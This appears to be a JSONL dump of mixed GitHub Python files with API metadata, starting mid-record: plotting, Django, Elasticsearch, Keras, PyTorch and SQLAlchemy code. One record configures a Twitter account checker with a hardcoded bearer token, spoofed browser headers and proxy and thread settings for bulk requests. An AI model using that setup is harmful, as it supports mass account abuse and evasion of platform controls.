"google.appengine.ext.ndb.StringProperty", "line_number": 12, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 12, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 20, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 30, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 42, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "webapp2.RequestHandler", "line_number": 48, "usage_type": "attribute"}, {"api_name": "webapp2.RequestHandler", "line_number": 63, "usage_type": "attribute"}, {"api_name": "webapp2.RequestHandler", "line_number": 71, "usage_type": "attribute"}, {"api_name": "webapp2.RequestHandler", "line_number": 77, "usage_type": "attribute"}, {"api_name": "webapp2.WSGIApplication", "line_number": 84, "usage_type": "call"}]}
+{"seq_id": "75092159446", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--filename', type=str, help=\"numberofcables\")\n args = parser.parse_args() \n filename = args.filename\n\n values = open(filename, \"r\")\n # values = values.read()\n valuesStr = values.read()\n print(valuesStr)\n\n ValuesList = list(valuesStr.split(\"\\n\"))\n cablesNum = []\n runtimeAv = []\n for value in ValuesList:\n value = list(value.split(\" \"))\n cablesNum.append(float(value[0]))\n runtimeAv.append(float(value[2]))\n\n p = np.poly1d(np.polyfit(cablesNum, runtimeAv, 2))\n cablesNumSpace = np.linspace(cablesNum[0], cablesNum[-1])\n plt.plot(cablesNum, runtimeAv, 'o', cablesNumSpace, p(cablesNumSpace), '-')\n plt.show()\nif __name__ == '__main__':\n main()\n", "repo_name": "IMRCLab/col-trans", "sub_path": "hardware/qp-solve/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 857, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.poly1d", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "20109986150", "text": "import os\nfrom datetime import datetime\n\n# Run this example with LC_TIME=[other locale] to use a different\n# locale's datetime formatting, eg:\n#\n# LC_TIME=en_US python examples/datetimecol.py\n# or\n# LC_TIME=en_GB python examples/datetimecol.py\nos.environ.setdefault('LC_TIME', 'en_GB') # noqa\n\nfrom flask_table import Table, Col, DatetimeCol\n\n\nclass Item(object):\n def __init__(self, name, dt):\n self.name = name\n self.dt = dt\n\n\nclass ItemTable(Table):\n name = Col('Name')\n dt = DatetimeCol('Datetime')\n\n\ndef main():\n items = [\n Item('Name1', datetime.now()),\n Item('Name2', datetime(2018, 1, 1, 12, 34, 56)),\n ]\n\n table = ItemTable(items)\n\n # or {{ table }} in jinja\n print(table.__html__())\n\nif __name__ == '__main__':\n main()\n", "repo_name": "plumdog/flask_table", "sub_path": "examples/datetimecol.py", "file_name": "datetimecol.py", "file_ext": "py", "file_size_in_byte": 785, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 206, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.environ.setdefault", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "flask_table.Table", "line_number": 21, "usage_type": "name"}, {"api_name": "flask_table.Col", "line_number": 22, "usage_type": "call"}, {"api_name": "flask_table.DatetimeCol", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "70052238167", "text": "from django.shortcuts import render,redirect\nfrom compose.forms import MailForm\n\n\n\n# Create your views here.\n# def index(request):\n# return render(request,'load.html')\n\ndef index(request):\n if request.method == \"POST\":\n form = MailForm(request.POST)\n if form.is_valid():\n mail_item=form.save(commit=False)\n mail_item.save()\n return redirect('/')\n else:\n form=MailForm()\n return render(request,'load.html',{'form':form})\n\n\n\n", "repo_name": "ArunBalajiR/Django-Email-Editor", "sub_path": "compose/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "compose.forms.MailForm", "line_number": 12, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 16, "usage_type": "call"}, {"api_name": "compose.forms.MailForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "38434551120", "text": "from typing import List\n\nfrom django.contrib.postgres.fields import ArrayField\nfrom django.db import models\n\nfrom django_elasticsearch_dsl import Document, fields\nfrom django_elasticsearch_dsl.documents import model_field_class_to_field_class\n\nfrom swp.models.fields import CombinedISBNField, LongURLField\n\nmodel_field_class_to_field_class[CombinedISBNField] = model_field_class_to_field_class[models.CharField]\nmodel_field_class_to_field_class[LongURLField] = model_field_class_to_field_class[models.URLField]\n\nANALYZERS = {\n 'ar': 'arabic',\n 'bg': 'bulgarian',\n 'bn': 'bengali',\n 'ca': 'catalan',\n 'ckb': 'sorani',\n 'cs': 'czech',\n 'da': 'danish',\n 'de': 'german',\n 'el': 'greek',\n 'en': 'english',\n 'es': 'spanish',\n 'et': 'estonian',\n 'eu': 'basque',\n 'fa': 'persian',\n 'fi': 'finnish',\n 'fr': 'french',\n 'ga': 'irish',\n 'gl': 'galician',\n 'hi': 'hindi',\n 'hu': 'hungarian',\n 'hy': 'armenian',\n 'id': 'indonesian',\n 'it': 'italian',\n 'ja': 'cjk',\n 'ko': 'cjk',\n 'lt': 'lithuanian',\n 'lv': 'latvian',\n 'nl': 'dutch',\n 'no': 'norwegian',\n 'pt': 'portuguese',\n 'ro': 'romanian',\n 'ru': 'russian',\n 'sv': 'swedish',\n 'th': 'thai',\n 'tr': 'turkish',\n 'zh': 'cjk'\n}\n\n\nclass TranslationField(fields.ObjectField):\n\n def __init__(self, attr=None, **kwargs):\n properties = {\n 'default': fields.TextField(analyzer='default'),\n }\n\n for language, analyzer in ANALYZERS.items():\n properties[language] = fields.TextField(analyzer=analyzer)\n\n super(TranslationField, self).__init__(attr, properties=properties, **kwargs)\n\n def get_value_from_instance(self, instance, field_value_to_ignore=None):\n return {\n 'default': super(fields.ObjectField, self).get_value_from_instance(\n instance=instance,\n field_value_to_ignore=field_value_to_ignore,\n ),\n }\n\n\ndef get_translation_fields(language, field_names):\n languages = [*ANALYZERS, 'default']\n\n if language in languages:\n languages.remove(language)\n languages.insert(0, language)\n\n return [f'{field}.{language}' for field in field_names for language in languages]\n\n\nclass FieldMixin:\n TRANSLATION_FIELDS: List[str] = []\n\n @classmethod\n def to_field(cls, field_name, model_field):\n if field_name in cls.TRANSLATION_FIELDS:\n return TranslationField(attr=field_name)\n\n if isinstance(model_field, ArrayField):\n base_field = Document.to_field(field_name, model_field.base_field)\n\n return fields.ListField(base_field)\n\n return Document.to_field(field_name, model_field)\n", "repo_name": "swp-berlin/webmonitor", "sub_path": "swp/documents/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 2713, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django_elasticsearch_dsl.documents.model_field_class_to_field_class", "line_number": 11, "usage_type": "name"}, {"api_name": "swp.models.fields.CombinedISBNField", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.documents.model_field_class_to_field_class", "line_number": 12, "usage_type": "name"}, {"api_name": "swp.models.fields.LongURLField", "line_number": 12, "usage_type": "name"}, {"api_name": "django.db.models.URLField", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 12, "usage_type": 
"name"}, {"api_name": "django_elasticsearch_dsl.fields.ObjectField", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django_elasticsearch_dsl.fields", "line_number": 54, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.fields.TextField", "line_number": 58, "usage_type": "call"}, {"api_name": "django_elasticsearch_dsl.fields", "line_number": 58, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.fields.TextField", "line_number": 62, "usage_type": "call"}, {"api_name": "django_elasticsearch_dsl.fields", "line_number": 62, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.fields.ObjectField", "line_number": 68, "usage_type": "attribute"}, {"api_name": "django_elasticsearch_dsl.fields", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 86, "usage_type": "name"}, {"api_name": "django.contrib.postgres.fields.ArrayField", "line_number": 93, "usage_type": "argument"}, {"api_name": "django_elasticsearch_dsl.Document.to_field", "line_number": 94, "usage_type": "call"}, {"api_name": "django_elasticsearch_dsl.Document", "line_number": 94, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.fields.ListField", "line_number": 96, "usage_type": "call"}, {"api_name": "django_elasticsearch_dsl.fields", "line_number": 96, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.Document.to_field", "line_number": 98, "usage_type": "call"}, {"api_name": "django_elasticsearch_dsl.Document", "line_number": 98, "usage_type": "name"}]}
+{"seq_id": "30725958167", "text": "''' import numpy as np\nimport pandas\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Input\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.utils import np_utils\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.pipeline import Pipeline\n\ndf = pandas.read_json('json_data.json')\n# replace nan with -1000\ndf.fillna(0, inplace=True)\ndataset = df.values\nX = dataset[:, df.columns != 'location'].astype(float)\n# multiple all values by -1\nX[:, :] = X[:, :] * -1/100\nY = dataset[:, df.columns == 'location']\n\nencoder = LabelEncoder()\nencoder.fit(Y)\nencoded_Y = encoder.transform(Y)\n# convert integers to dummy variables (i.e. one hot encoded)\ndummy_y = np_utils.to_categorical(encoded_Y)\nprint(dummy_y)\n\nprint(X)\n\n# define baseline model\n\n\ndef create_model():\n # create model\n model = Sequential()\n model.add(Input(shape=np.shape(X[0]), name='input'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(2, activation='softmax'))\n # Compile model\n model.compile(loss='categorical_crossentropy',\n optimizer='rmsprop', metrics=['accuracy'])\n return model\n\n\nmodel = create_model()\nhistory_callback = model.fit(X, dummy_y, epochs=100, batch_size=50)\nscore = model.evaluate(X, dummy_y, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\ny_pred = model.predict(X)\nactual = np.argmax(dummy_y, axis=1)\npredicted = np.argmax(y_pred, axis=1)\nprint(actual)\nprint(predicted)\n# save the model to disk\nmodel.save('model.h5')\n '''\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport tensorflow as tf\n\ndf = pd.read_csv('data_file.csv')\ndf.fillna(0, inplace=True)\n\ndf['is_inside'] = [\n 1 if typ == 'inside' else 0 for typ in df['location']\n]\ndf.drop('location', axis=1, inplace=True)\n\nX = df.drop('is_inside', axis=1)\ny = df['is_inside']\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y,\n test_size=0.2, random_state=42\n)\n\nscaler = StandardScaler()\nX_train_scaled = scaler.fit_transform(X_train)\nX_test_scaled = scaler.transform(X_test)\n\n\ntf.random.set_seed(42)\n\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(256, activation='relu'),\n tf.keras.layers.Dense(256, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\n\nmodel.compile(\n loss=tf.keras.losses.binary_crossentropy,\n optimizer=tf.keras.optimizers.Adam(lr=0.03),\n metrics=[\n tf.keras.metrics.BinaryAccuracy(name='accuracy'),\n tf.keras.metrics.Precision(name='precision'),\n tf.keras.metrics.Recall(name='recall')\n ]\n)\n\nhistory = model.fit(X_train_scaled, y_train, epochs=100)\n\npredictions = model.predict(X_test_scaled)\n\nprediction_classes = [\n 1 if prob > 0.5 else 0 for prob in np.ravel(predictions)\n]\n\nprint(prediction_classes)\n\nmodel.save('model.h5')\n", "repo_name": "helloparthshah/ecs172Labs", "sub_path": "Lab6/python server/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 3107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 67, "usage_type": "call"}, {"api_name": 
"sklearn.model_selection.train_test_split", "line_number": 78, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.random.set_seed", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 100, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.BinaryAccuracy", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.Precision", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.Recall", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.ravel", "line_number": 113, "usage_type": "call"}]}
+{"seq_id": "8121484503", "text": "import functools\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport itertools\nfrom functools import reduce\n\nimport torch.nn.functional as F\nimport math\nfrom math import cos,atan\n\n#CCD相机参数\nCCD_length = 7.7\nCCD_width = 5.5\nox = CCD_width/2\noy = CCD_length/2\na = 8.3\nk = 4\ndx = 0.00859375\ndy = 0.00859375\nf = 8\n\nclass dis_conv(nn.Module):\n def __init__(self, w, h, batch_size):\n super(dis_conv,self).__init__()\n w0, h0 = w, h\n batch_size0 = batch_size\n self.bn = np.zeros((h0,w0))\n for i in range(h0):\n for j in range(w0):\n a0 = atan(dx*(j-ox)/f)\n self.bn[i,j] = math.floor((cos(a0)-1)*(i-oy))\n \n self.conv1 = nn.Conv2d(3, 3, kernel_size=3, stride=1, padding=0,\n bias=False)\n \n def forward(self,input):\n input = input.cuda()\n shape1 = input.shape\n #print(shape1)\n \n feature1 = torch.zeros((shape1[0],shape1[1],shape1[2],(shape1[3])))\n \n \n matrix1 = torch.zeros((shape1[0],shape1[1],3,3)).cuda()\n \n tb = torch.zeros((9),dtype=torch.int)\n for i in range(shape1[2]):\n for j in range(shape1[3]):\n if i+2= 256:\n j1 = j%256\n tb[k] = int(i+int(k/3)+self.bn[int(i+k/3),int(j1+k%3)])\n else:\n tb[k] = int(i+int(k/3)+self.bn[int(i+k/3),int(j+k%3)])\n \n matrix1[:,:,int(k/3),int(k%3)] = input[:,:,tb[k],int(k%3)]\n \n \n feature1[:,:,i,j] = self.conv1(matrix1).reshape(shape1[0],shape1[1])\n \n out = feature1\n \n out = out.cuda()\n return out\n \n \n ", "repo_name": "hukexiangcun/DDCNet", "sub_path": "DDCNet_allV1/modeling/s2cnn/dis_convolutional.py", "file_name": "dis_convolutional.py", "file_ext": "py", "file_size_in_byte": 2077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 31, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 32, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.int", "line_number": 47, "usage_type": "attribute"}]}
+{"seq_id": "73586569048", "text": "\nimport import_declare_test\n\nfrom splunktaucclib.rest_handler.endpoint import (\n field,\n validator,\n RestModel,\n SingleModel,\n)\nfrom splunktaucclib.rest_handler import admin_external, util\nfrom splunktaucclib.rest_handler.admin_external import AdminExternalHandler\nimport logging\n\nutil.remove_http_proxy_env_vars()\n\n\nfields = [\n field.RestField(\n 'account_username',\n required=True,\n encrypted=False,\n default=None,\n validator=validator.String(\n max_len=50, \n min_len=1, \n )\n ), \n field.RestField(\n 'account_password',\n required=True,\n encrypted=True,\n default=None,\n validator=validator.String(\n max_len=8192, \n min_len=1, \n )\n )\n]\nmodel = RestModel(fields, name=None)\n\n\nendpoint = SingleModel(\n 'graphee_accounts',\n model,\n config_name='accounts'\n)\n\n\nif __name__ == '__main__':\n logging.getLogger().addHandler(logging.NullHandler())\n admin_external.handle(\n endpoint,\n handler=AdminExternalHandler,\n )\n", "repo_name": "Bamfax/graphee", "sub_path": "graphee/bin/graphee_rh_accounts.py", "file_name": "graphee_rh_accounts.py", "file_ext": "py", "file_size_in_byte": 1088, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "splunktaucclib.rest_handler.util.remove_http_proxy_env_vars", "line_number": 14, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.util", "line_number": 14, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.endpoint.field.RestField", "line_number": 18, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.endpoint.field", "line_number": 18, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.endpoint.validator.String", "line_number": 23, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.endpoint.validator", "line_number": 23, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.endpoint.field.RestField", "line_number": 28, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.endpoint.field", "line_number": 28, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.endpoint.validator.String", "line_number": 33, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.endpoint.validator", "line_number": 33, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.endpoint.RestModel", "line_number": 39, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.endpoint.SingleModel", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.NullHandler", "line_number": 50, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.admin_external.handle", "line_number": 51, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.admin_external", "line_number": 51, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.admin_external.AdminExternalHandler", "line_number": 53, "usage_type": "name"}]}
+{"seq_id": "38663618070", "text": "import json\nVERSION = \"5.0\"\nPROFILE_HEADERS = {\n 'authority': 'twitter.com',\n 'accept': '*/*',\n 'accept-language': 'en-US,en;q=0.9',\n 'authorization': 'Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA',\n 'origin': 'https://twitter.com',\n 'referer': 'https://twitter.com/settings/profile',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'sec-gpc': '1',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',\n 'x-twitter-active-user': 'yes',\n 'x-twitter-auth-type': 'OAuth2Session',\n 'x-twitter-client-language': 'en'\n}\n\nwith open(\"config.json\", \"r\") as f:\n config = json.load(f)\n\nPROXY_URL = config.get(\"proxy\")\nNUM_THREADS = config.get(\"threads\")\nCT0_FIX = config.get(\"ct0_fix\")\nMAX_RETRIES = 10\n\nif PROXY_URL:\n PROXY = f\"http://{PROXY_URL}\"\nelse:\n PROXY = None\n", "repo_name": "FatBeeBHW/Twitter-Account-Checker", "sub_path": "util/const.py", "file_name": "const.py", "file_ext": "py", "file_size_in_byte": 994, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.load", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "70728461848", "text": "from infrastructure.dataset_repository import DatasetRepository\nfrom domain.dataset_factory import DatasetFactory\nfrom domain.service import PreprocessingOptions, PreprocessingService\nfrom infrastructure.metadata import MetadataRepository\nfrom pydantic import BaseModel\nfrom typing import List, Dict\nfrom domain.service import Metadata\n\nclass PreprocessingFitTransformArgs(BaseModel):\n input_dir_path: str\n output_dir_path: str\n fulfillment_mode: str\n columns_to_fulfill: List[str]\n\nclass PreprocessingFitTransformFacade:\n def __init__(self,\n dataset_repository: DatasetRepository,\n preprocessing_service: PreprocessingService,\n metadata_repository: MetadataRepository,\n ):\n self._dataset_repository = dataset_repository\n self._preprocessing_service = preprocessing_service\n self._metadata_repository = metadata_repository\n\n def fit_transform(self, args: PreprocessingFitTransformArgs):\n dataset_factory = DatasetFactory(self._dataset_repository)\n dataset = dataset_factory.create_from_files(\n input_dir_path=args.input_dir_path)\n\n preprocessing_options = PreprocessingOptions(fulfillment_mode=args.fulfillment_mode,\n columns_to_fulfill=args.columns_to_fulfill,\n )\n\n metadata = self._preprocessing_service.preprocess(dataset=dataset,\n preprocessing_options=preprocessing_options,\n )\n self._dataset_repository.save_dataset(\n dataset, output_dir_path=args.output_dir_path)\n\n self._metadata_repository.save_metadata(\n metadata=metadata.to_dict(), run_name=args.run_name)\n\nclass PreprocessingTransformFacade:\n def __init__(self,\n metadata_repository: MetadataRepository,\n preprocessing_service: PreprocessingService,\n dataset_repository: DatasetRepository,\n ):\n self._metadata_repository = metadata_repository\n self._preprocessing_service = preprocessing_service\n self._dataset_repository = dataset_repository\n\n def transform(self,\n measurements: List[Dict],\n run_name: str):\n\n measurements_series = DatasetFactory.create_from_dict(measurements)\n\n metadata = Metadata.from_dict(self._metadata_repository.get_metadata(\n run_name=run_name))\n\n preprocessing_options = PreprocessingOptions(fulfillment_mode=metadata.filler_metadata['filler_type'], \n columns_to_fulfill=list(metadata.filler_metadata[\n 'filler_value'].keys()),\n )\n\n self._preprocessing_service.preprocess(dataset=measurements_series,\n preprocessing_options=preprocessing_options,\n metadata_do=metadata,\n ) ", "repo_name": "swiatowiec/Forecast", "sub_path": "preprocessing/domain/facade.py", "file_name": "facade.py", "file_ext": "py", "file_size_in_byte": 3176, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pydantic.BaseModel", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "infrastructure.dataset_repository.DatasetRepository", "line_number": 17, "usage_type": "name"}, {"api_name": "domain.service.PreprocessingService", "line_number": 18, "usage_type": "name"}, {"api_name": "infrastructure.metadata.MetadataRepository", "line_number": 19, "usage_type": "name"}, {"api_name": "domain.dataset_factory.DatasetFactory", "line_number": 26, "usage_type": "call"}, {"api_name": "domain.service.PreprocessingOptions", "line_number": 30, "usage_type": "call"}, {"api_name": "infrastructure.metadata.MetadataRepository", "line_number": 45, "usage_type": "name"}, {"api_name": "domain.service.PreprocessingService", "line_number": 46, 
"usage_type": "name"}, {"api_name": "infrastructure.dataset_repository.DatasetRepository", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "name"}, {"api_name": "domain.dataset_factory.DatasetFactory.create_from_dict", "line_number": 57, "usage_type": "call"}, {"api_name": "domain.dataset_factory.DatasetFactory", "line_number": 57, "usage_type": "name"}, {"api_name": "domain.service.Metadata.from_dict", "line_number": 59, "usage_type": "call"}, {"api_name": "domain.service.Metadata", "line_number": 59, "usage_type": "name"}, {"api_name": "domain.service.PreprocessingOptions", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "26367644375", "text": "# !/usr/bin/env python\n# -*- coding: utf8 -*-\n\nfrom sqlalchemy import Column, BIGINT, BOOLEAN, VARCHAR, ForeignKey\nfrom sqlalchemy.orm import relationship\n\nfrom .base import MyMixin, Base, BaseOrm\n\nfrom utils.orm_format import model_to_list, session_auto_commit\n\n\nclass UserModel(MyMixin, Base):\n __tablename__ = \"user\"\n\n id = Column(BIGINT, primary_key=True, autoincrement=True)\n email = Column(VARCHAR(255), unique=True)\n mobileNumber = Column(VARCHAR(16))\n isActive = Column(BOOLEAN)\n isAdmin = Column(BOOLEAN)\n password = Column(VARCHAR(255))\n username = Column(VARCHAR(255), unique=True)\n receiveNoticeEmail = Column(BOOLEAN)\n passwordRecoveryCode = Column(VARCHAR(255))\n orderCount = Column(BIGINT)\n city_id = Column(BIGINT, ForeignKey(\"city.id\"))\n successOrderCount = Column(BIGINT)\n realName = Column(VARCHAR(255))\n removed = Column(BOOLEAN)\n orders = relationship(\"OrderModel\", back_populates=\"user\")\n addresses = relationship(\"AddressesModel\", back_populates=\"user\")\n oauth2_session = relationship(\"Oauth2SessionModel\", back_populates=\"user\")\n\n\nclass UserOrm(BaseOrm):\n def __init__(self, db):\n super().__init__(db)\n\n @model_to_list\n def get_all_users(self):\n return self.session.query(UserModel).order_by(UserModel.id).all()\n\n def get_all_mobile_number(self):\n return self.session.query(UserModel.mobileNumber).all()\n\n @session_auto_commit\n def add_users(self, param):\n new_user = UserModel(**param)\n self.session.add(new_user)\n\n @session_auto_commit\n def del_users(self, param):\n del_user = self.session.query(UserModel).filter_by(**param).first()\n self.session.delete(del_user)\n\n @model_to_list\n def search_users(self, param):\n users = self.session.query(UserModel).filter_by(**param).first()\n return users\n\n @session_auto_commit\n def update_users(self, query_param, update_param):\n self.session.query(UserModel).filter_by(**query_param).update(update_param)\n", "repo_name": "Zacard274/library", "sub_path": "orm/user.py", "file_name": "user.py", "file_ext": "py", "file_size_in_byte": 2032, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "base.MyMixin", "line_number": 12, "usage_type": "name"}, {"api_name": "base.Base", "line_number": 12, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.BIGINT", "line_number": 15, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 18, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 19, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": 
